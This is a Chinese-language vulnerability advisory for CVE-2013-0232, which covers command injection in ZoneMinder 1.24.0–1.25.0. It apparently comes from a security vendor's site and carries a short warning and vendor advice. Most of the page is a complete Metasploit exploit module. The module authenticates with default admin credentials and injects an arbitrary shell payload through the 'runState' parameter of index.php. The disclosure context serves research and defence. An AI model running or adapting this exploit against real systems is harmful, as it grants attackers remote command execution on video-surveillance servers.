安全研究
安全漏洞
ZoneMinder 多个远程任意命令执行漏洞
发布日期:2013-01-31
更新日期:2013-02-01
受影响系统:
ZoneMinder ZoneMinder 1.24.0 - 1.25.0描述:
CVE(CAN) ID: CVE-2013-0232
ZoneMinder是单个或多个摄像机视频安全应用。
ZoneMinder 1.24.0至1.25.0版本没有正确验证用户提供的输入,在实现上存在多个任意命令执行漏洞,攻击者可利用这些漏洞在受影响应用程序上下文中执行任意命令。
<*来源:vendor
链接:http://www.30soc.com/News/detail_7203.aspx
http://www.exploit-db.com/exploits/24310/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'ZoneMinder Video Server packageControl Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability in ZoneMinder Video
Server version 1.24.0 to 1.25.0 which could be abused to allow
authenticated users to execute arbitrary commands under the context of the
web server user. The 'packageControl' function in the
'includes/actions.php' file calls 'exec()' with user controlled data
from the 'runState' parameter.
},
'References' =>
[
['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'],
],
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'License' => MSF_LICENSE,
'Privileged' => true,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'BadChars' => "\x00",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
},
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => "Jan 22 2013",
))
register_options([
OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),
OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),
OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
base = target_uri.path
base << '/' if base[-1, 1] != '/'
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
data = "action=login&view=version&username=#{user}&password=#{pass}"
# login and retrieve software version
print_status("#{peer} - Authenticating as user '#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}index.php",
'cookie' => "#{cookie}",
'data' => "#{data}",
})
if res and res.code == 200
if res.body =~ /<title>ZM - Login<\/title>/
print_error("#{peer} - Authentication failed")
return Exploit::CheckCode::Unknown
elsif res.body =~ /v1.2(4\.\d+|5\.0)/
return Exploit::CheckCode::Appears
elsif res.body =~ /<title>ZM/
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
def exploit
@peer = "#{rhost}:#{rport}"
base = target_uri.path
base << '/' if base[-1, 1] != '/'
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
user = datastore['USERNAME']
pass = datastore['PASSWORD']
data = "action=login&view=postlogin&username=#{user}&password=#{pass}"
command = Rex::Text.uri_encode(payload.encoded)
# login
print_status("#{@peer} - Authenticating as user '#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}index.php",
'cookie' => "#{cookie}",
'data' => "#{data}",
})
if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
end
print_good("#{@peer} - Authenticated successfully")
# send payload
print_status("#{@peer} - Sending payload (#{command.length} bytes)")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}index.php",
'data' => "view=none&action=state&runState=start;#{command}%26",
'cookie' => "#{cookie}"
})
if res and res.code == 200
print_good("#{@peer} - Payload sent successfully")
else
fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
end
end
end
建议:
厂商补丁:
ZoneMinder
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.zoneminder.com/
浏览次数:3962
严重程度:0(网友投票)
绿盟科技给您安全的保障